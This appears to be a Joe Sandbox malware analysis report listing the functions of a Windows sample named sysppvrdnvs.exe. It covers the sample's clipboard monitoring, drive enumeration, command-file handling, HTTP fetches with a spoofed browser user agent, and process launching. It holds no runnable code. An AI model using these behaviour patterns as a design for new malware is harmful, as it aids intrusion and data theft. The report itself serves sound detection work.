API ID: gethostbynamegethostnamestrcmp
String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
API String ID: 2906596889-2213908610
Opcode ID: 5b9ae2d183a319b68884f4aa771505d4aae3a4737099f9eb71a98d0230e188d4
Instruction ID: 8d4abfb17ef92fbeb3a58b36540fc168dced5822f8e8c36773a64fbd4adfcb3b
Opcode Fuzzy Hash: 5b9ae2d183a319b68884f4aa771505d4aae3a4737099f9eb71a98d0230e188d4
Instruction Fuzzy Hash: 826181B5A00205ABDB00AFA1FC46B9A3665EB50318F14847AE805B73C1EB7DE554CBDE

Function 004059B0 Relevance: 25.7, APIs: 17, Instructions: 186
clipboardregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004059BC
SetClipboardViewer.USER32(?), ref: 00405A08
SetWindowLongW.USER32(?,000000EB,?), ref: 00405A1B
IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A70
OpenClipboard.USER32(00000000), ref: 00405AB7
GetClipboardData.USER32(00000000), ref: 00405AC9
RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405BD0
ChangeClipboardChain.USER32(?,?), ref: 00405BDE
DefWindowProcA.USER32(?,?,?,?), ref: 00405BF4

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
String ID:
API String ID: 3549449529-0
Opcode ID: dee7b1af12479445aaed8c2a515aabfb2702732359421cc2ae86defdf91b9e48
Instruction ID: 96d86bc259bd628418629a5c2f452591d45261003c5ffeff5fe086a58ca8b5ae
Opcode Fuzzy Hash: dee7b1af12479445aaed8c2a515aabfb2702732359421cc2ae86defdf91b9e48
Instruction Fuzzy Hash: EB711C75A00608EFDF14DFA4D988BEF77B4EB48300F14856AE506B7290D779AA40CF69

Function 00406F70 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 106
sleepthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(000003E8), ref: 00406F7E
GetModuleFileNameW.KERNEL32(00000000,C:\Windows\sysppvrdnvs.exe,00000104), ref: 00406F90

Part of subcall function 0040F1F0: CreateFileW.KERNEL32(00406FA0,80000000,00000001,00000000,00000003,00000000,00000000,00406FA0), ref: 0040F210
Part of subcall function 0040F1F0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F225
Part of subcall function 0040F1F0: CloseHandle.KERNEL32(000000FF), ref: 0040F232

ExitThread.KERNEL32 ref: 004070FA

Part of subcall function 004063E0: GetLogicalDrives.KERNEL32 ref: 004063E6
Part of subcall function 004063E0: RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
Part of subcall function 004063E0: RegQueryValueExW.KERNEL32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
Part of subcall function 004063E0: RegCloseKey.ADVAPI32(?), ref: 0040647E

Sleep.KERNEL32(000007D0), ref: 004070ED

Part of subcall function 00406300: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406353

GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 0040702F
GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00407044
_aulldiv.NTDLL(?,?,40000000,00000000), ref: 0040705F
wsprintfW.USER32 ref: 00407072
wsprintfW.USER32 ref: 00407092
wsprintfW.USER32 ref: 004070B5

Strings

C:\Windows\sysppvrdnvs.exe, xrefs: 00406F89, 00406F96
%s%s, xrefs: 004070A9
(%dGB), xrefs: 00407066
Unnamed volume, xrefs: 00407086

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
String ID: (%dGB)$%s%s$C:\Windows\sysppvrdnvs.exe$Unnamed volume
API String ID: 1650488544-747518629
Opcode ID: 36835f4b582c7264fa9310f82983a243ead37fe316eb445b52cb330bcd55ef35
Instruction ID: b797a4b926279b24144ff746e96c568fb56fd9e530b7e1178aba5a8e6206bca3
Opcode Fuzzy Hash: 36835f4b582c7264fa9310f82983a243ead37fe316eb445b52cb330bcd55ef35
Instruction Fuzzy Hash: 244174B1D00214BBEB64DB94DC45FEE7779BB48700F1085A6F20AB61D0DA785B84CF6A

Function 004058C0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 73
windowsleepregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 004058D8
GetModuleHandleW.KERNEL32(00000000), ref: 004058F0
Sleep.KERNEL32(00000001), ref: 00405904
GetTickCount.KERNEL32 ref: 0040590A
GetTickCount.KERNEL32 ref: 00405913
wsprintfW.USER32 ref: 00405926
RegisterClassExW.USER32(00000030), ref: 00405933
CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040595C
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405977
TranslateMessage.USER32(?), ref: 00405985
DispatchMessageA.USER32(?), ref: 0040598F
ExitThread.KERNEL32 ref: 004059A1

Strings

%x%X, xrefs: 0040591A
0, xrefs: 004058E0

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
String ID: %x%X$0
API String ID: 716646876-225668902
Opcode ID: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
Instruction ID: bd9536bbadbf21864e97b89de5b907373c0f6f38ddabaab6f1c3dd09ba998754
Opcode Fuzzy Hash: 03a63f419c221d19dc1f4a22be05731f57d92fe9a42c49428073284f968a398b
Instruction Fuzzy Hash: C7211AB1940308FBEB109BA0DD49FEE7B78EB04711F14852AF601BA1D0DBB99544CF69

Function 0040F240 Relevance: 16.6, APIs: 11, Instructions: 144
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040F272
CreateFileMappingW.KERNELBASE(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040F293
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040F2B2
GetFileSize.KERNEL32(000000FF,00000000), ref: 0040F2CB
memcmp.NTDLL ref: 0040F35D
UnmapViewOfFile.KERNEL32(00000000), ref: 0040F380
CloseHandle.KERNEL32(00000000), ref: 0040F38A
CloseHandle.KERNEL32(000000FF), ref: 0040F394
CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040F3B3
WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040F3D8
CloseHandle.KERNEL32(000000FF), ref: 0040F3E2

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandle$View$MappingSizeUnmapWritememcmp
String ID:
API String ID: 3902698870-0
Opcode ID: 4db5bbf808ca6209af07bc620d99265e856426a218e6ae7e28e736729e861070
Instruction ID: 91565a6fedc79cda49cfd97bae5198494bb6489b7e374c7f74ac69d8e3e388a5
Opcode Fuzzy Hash: 4db5bbf808ca6209af07bc620d99265e856426a218e6ae7e28e736729e861070
Instruction Fuzzy Hash: 75514BB4E40308FBDB24DBA4CC49F9EB774AB48304F108569F611B72C0D7B9AA44CB98

Function 0040DD50 Relevance: 16.6, APIs: 11, Instructions: 95
threadsleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0040DD56
GetThreadPriority.KERNEL32(00000000,?,?,?,00408480,02D90638,000000FF), ref: 0040DD5D
GetCurrentThread.KERNEL32 ref: 0040DD68
SetThreadPriority.KERNEL32(00000000,?,?,?,00408480,02D90638,000000FF), ref: 0040DD6F
InterlockedExchangeAdd.KERNEL32(00408480,00000000), ref: 0040DD92
EnterCriticalSection.KERNEL32(000000FB), ref: 0040DDC7
WaitForSingleObject.KERNEL32(000000FF,00000000), ref: 0040DE12
LeaveCriticalSection.KERNEL32(000000FB), ref: 0040DE2E
Sleep.KERNEL32(00000001), ref: 0040DE5E
GetCurrentThread.KERNEL32 ref: 0040DE6D
SetThreadPriority.KERNEL32(00000000,?,?,?,00408480), ref: 0040DE74

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Thread$CurrentPriority$CriticalSection$EnterExchangeInterlockedLeaveObjectSingleSleepWait
String ID:
API String ID: 3862671961-0
Opcode ID: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
Instruction ID: 15ec6ce41066bd2df298828df26a4308ea05a03792f046612c1f6ffbd780898a
Opcode Fuzzy Hash: 5618e667e755a89869c685173e38bf799e2d1f6c3c7819217eae43ff0fa2d7e3
Instruction Fuzzy Hash: 1B412C74E00209DBDB04DFE4D844BAEBB71FF54315F108169E916AB381D7789A84CF99

Function 0040BC70 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(004165F8,?,?,?,?,?,?,00408403), ref: 0040BC7B
CreateFileW.KERNEL32(C:\Users\user\tbtnds.dat,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040BCCD
CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040BCEE
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040BD0D
GetFileSize.KERNEL32(000000FF,00000000), ref: 0040BD22
UnmapViewOfFile.KERNEL32(00000000), ref: 0040BD88
CloseHandle.KERNEL32(00000000), ref: 0040BD92
CloseHandle.KERNEL32(000000FF), ref: 0040BD9C

Part of subcall function 0040DF20: NtQuerySystemTime.NTDLL(0040BD65), ref: 0040DF2A
Part of subcall function 0040DF20: RtlTimeToSecondsSince1980.NTDLL(0040BD65,?), ref: 0040DF38

Strings

C:\Users\user\tbtnds.dat, xrefs: 0040BCC8

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleTimeView$CriticalInitializeMappingQuerySecondsSectionSince1980SizeSystemUnmap
String ID: C:\Users\user\tbtnds.dat
API String ID: 439099756-4102076924
Opcode ID: ccc133b3a2719448c357ee090de33a9a253bd19a1288fb5d1e4dd52cd71b561e
Instruction ID: 789285c27e92e60cc42243599a26330008c438e37824d2da8ff51af530b364ad
Opcode Fuzzy Hash: ccc133b3a2719448c357ee090de33a9a253bd19a1288fb5d1e4dd52cd71b561e
Instruction Fuzzy Hash: 0F413A74E40309EBDB10EBA4DC4ABAEB774EB44705F20856AF6117A2C1C7B96941CB9C

Function 00405C00 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 97
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSection.KERNEL32(00415B88,?,?,?,?,?,004083CD), ref: 00405C0B
CreateFileW.KERNEL32(C:\Users\user\tbtcmds.dat,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,004083CD), ref: 00405C25
CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 00405C46
MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00405C65
GetFileSize.KERNEL32(000000FF,00000000), ref: 00405C7E
UnmapViewOfFile.KERNEL32(00000000), ref: 00405D0B
CloseHandle.KERNEL32(00000000), ref: 00405D15
CloseHandle.KERNEL32(000000FF), ref: 00405D1F

Strings

C:\Users\user\tbtcmds.dat, xrefs: 00405C20

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleView$CriticalInitializeMappingSectionSizeUnmap
String ID: C:\Users\user\tbtcmds.dat
API String ID: 3956458805-613388763
Opcode ID: 974004ace8664300cc06a05cec65fa0b1c2f2106c5fa1c12cbbfe4d81678685e
Instruction ID: 999418e1eeb904d95552c7fd1475d0c30f1e1fd8627807f9f1e65d0b0efdc9c4
Opcode Fuzzy Hash: 974004ace8664300cc06a05cec65fa0b1c2f2106c5fa1c12cbbfe4d81678685e
Instruction Fuzzy Hash: DE310E74E40209EBDB14DBA4DC49FAFB774EB48700F20856AE6017B2C0D7B96941CF99

Function 0040F400 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 60
sleepprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.NTDLL ref: 0040F40E
memset.NTDLL ref: 0040F41E
CreateProcessW.KERNEL32(00000000,00407D11,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0040F457
Sleep.KERNEL32(000003E8), ref: 0040F467
ShellExecuteW.SHELL32(00000000,open,00407D11,00000000,00000000,00000000), ref: 0040F482
Sleep.KERNEL32(000003E8), ref: 0040F49C

Strings

open, xrefs: 0040F47B
, xrefs: 0040F491
D, xrefs: 0040F426

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Sleepmemset$CreateExecuteProcessShell
String ID: $D$open
API String ID: 3787208655-2182757814
Opcode ID: 86490e0f5312193f556b58b4939b15177e1386a4ac5e4b01298813237b5ed1b8
Instruction ID: 03d024a0b9a73c413bf1553ab10d0ee3a8ab15297eec0ef6a9417e1ec1830951
Opcode Fuzzy Hash: 86490e0f5312193f556b58b4939b15177e1386a4ac5e4b01298813237b5ed1b8
Instruction Fuzzy Hash: ED112B71A80308BAEB209B90CD46FDE7778AB14B10F204135FA047E2C0D6B9AA448759

Function 004060A0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 176
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(00415B88,00000000,0040C2A2,006A0266,?,0040C2BE,00000000,0040D66C,?), ref: 004060AF
memcpy.NTDLL(?,00000000,00000100), ref: 00406141
CreateFileW.KERNEL32(C:\Users\user\tbtcmds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00406265
WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 004062C7
FlushFileBuffers.KERNEL32(000000FF), ref: 004062D3
CloseHandle.KERNEL32(000000FF), ref: 004062DD
LeaveCriticalSection.KERNEL32(00415B88,?,?,?,?,?,?,0040C2BE,00000000,0040D66C,?), ref: 004062E8

Strings

C:\Users\user\tbtcmds.dat, xrefs: 00406260

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWritememcpy
String ID: C:\Users\user\tbtcmds.dat
API String ID: 1457358591-613388763
Opcode ID: 473e882c89c664cfdcd286b03a5016877069028d52e26d7ad4cadbb5d95af1e0
Instruction ID: a605c5c2860c2acc1241a09a2373603bf375adc509756cd8cb030c585388e075
Opcode Fuzzy Hash: 473e882c89c664cfdcd286b03a5016877069028d52e26d7ad4cadbb5d95af1e0
Instruction Fuzzy Hash: D171BCB4E042099FCB04DF94D981FEFB7B1AF88304F14816DE506AB381D779A951CBA9

Function 0040E310 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040E35E
Sleep.KERNEL32(000003E8), ref: 0040E36E
StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040E38B
StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040E3A1
StrChrA.SHLWAPI(?,0000000D), ref: 0040E3CE

Strings

HTTP/1.1 200 OK, xrefs: 0040E37F
LOCATION: , xrefs: 0040E395

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Sleeprecvfrom
String ID: HTTP/1.1 200 OK$LOCATION:
API String ID: 668330359-3973262388
Opcode ID: adc9e1b642c8ef13301026d6139dd454e63dc363d970614d04e973e17512e1fe
Instruction ID: e67ba9521a541be798431772fb319970cc3d6429c6b3b7a9c3ce28b53cac335a
Opcode Fuzzy Hash: adc9e1b642c8ef13301026d6139dd454e63dc363d970614d04e973e17512e1fe
Instruction Fuzzy Hash: 5E2130B0940218ABDB20CB65DC45BE9BB74AB04308F1085E9EB19B72C0D7B95AD6CF5D

Function 0040F4B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57networksleepCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040F4C7
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040F4E6
HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040F50F
InternetCloseHandle.WININET(00000000), ref: 0040F538
InternetCloseHandle.WININET(00000000), ref: 0040F542
Sleep.KERNEL32(000003E8), ref: 0040F54D

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36, xrefs: 0040F4C2

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
API String ID: 2743515581-2960703779
Opcode ID: eac7a16544c45e3c29eec32ac406d7a69024a54342cccca2c138cb753e28bf4a
Instruction ID: af5d65e8d2fa993cc87ce820da5284d466d7432e490674ab1d3698c460306143
Opcode Fuzzy Hash: eac7a16544c45e3c29eec32ac406d7a69024a54342cccca2c138cb753e28bf4a
Instruction Fuzzy Hash: E7212975A40308BBDB20DF94CC49FEEB7B5AB04705F1084A5EA11AB2C0C7B9AA84CB55

Function 0040B530 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(C:\Users\user\tbtnds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 0040B5C8
WriteFile.KERNEL32(000000FF,00000000,?,?,00000000), ref: 0040B5E9
FlushFileBuffers.KERNEL32(000000FF), ref: 0040B5F3
CloseHandle.KERNEL32(000000FF), ref: 0040B5FD
InterlockedExchange.KERNEL32(00414FB0,0000003D), ref: 0040B60A

Strings

C:\Users\user\tbtnds.dat, xrefs: 0040B5C3

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
String ID: C:\Users\user\tbtnds.dat
API String ID: 442028454-4102076924
Opcode ID: 3151d336ff3ea58e3689bb3ae90e4ef78bf08bbeca3ebf0d4b51fe39718170bb
Instruction ID: a0ca425d267a8141d5e1d1f6c90da30668f0d4feb664184cc2dbb6b4fe126232
Opcode Fuzzy Hash: 3151d336ff3ea58e3689bb3ae90e4ef78bf08bbeca3ebf0d4b51fe39718170bb
Instruction Fuzzy Hash: 93312BB4A00208EBCB14DF94DC45FAEB775FB88304F208969E51567390D775AA41CF99

Function 004077F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000003E8), ref: 0040786D
Sleep.KERNEL32(000003E8), ref: 0040789C
wsprintfA.USER32 ref: 004078C7
DeleteUrlCacheEntry.WININET(?), ref: 004078D7
Sleep.KERNEL32(000DBBA0), ref: 0040791F

Strings

%s%s, xrefs: 004078BB

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: Sleep$CacheDeleteEntrywsprintf
String ID: %s%s
API String ID: 1447977647-3252725368
Opcode ID: 0f885536a534958de828f6dadf3c238a14188cbeabebc74b6a6376721a3f9b9c
Instruction ID: a96cc5071c69656b1b6f4b00c6699880e4d6530ea1aa1078cf67c052952084b8
Opcode Fuzzy Hash: 0f885536a534958de828f6dadf3c238a14188cbeabebc74b6a6376721a3f9b9c
Instruction Fuzzy Hash: 643116B0C01218DFCB50DFA8DC887EDBBB4BB48304F1085AAE609B6290D7795AC4CF59

Function 004063E0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55registryCOMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 004063E6
RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00406434
RegQueryValueExW.KERNEL32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406461
RegCloseKey.ADVAPI32(?), ref: 0040647E

Strings

NoDrives, xrefs: 00406458
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00406427

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960162606.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sysppvrdnvs.jbxd

Yara matches

Similarity

API ID: CloseDrivesLogicalOpenQueryValue
String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
API String ID: 2666887985-3471754645
Opcode ID: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
Instruction ID: 87cba227ccd7b938b07588cb79f30f32aa16a0fd6c84a7572e83495dfcaef010
Opcode Fuzzy Hash: dded7858fb8d287b6bf9178ccf4275851236264e48071ce0b3ae741169170e3e
Instruction Fuzzy Hash: D311FCB0E0020A9BDB10CFD0D945BEEBBB4BB08304F118119E615B7280D7B85685CF99

Function 0040DBE0 Relevance: 9.1, APIs: 6, Instructions: 80threadCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040DC04

Part of subcall function 0040DCD0: WaitForSingleObject.KERNEL32(?,00000000), ref: 0040DD10
Part of subcall function 0040DCD0: CloseHandle.KERNEL32(?), ref: 0040DD29

CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040DC5F
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040DC9C
GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040DCA7
DuplicateHandle.KERNEL32(00000000), ref: 0040DCAE
LeaveCriticalSection.KERNEL32(-00000004), ref: 0040DCC2

Memory Dump Source

Source File: 00000006.00000002.1960106535.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.1960076602.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.1960141722.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
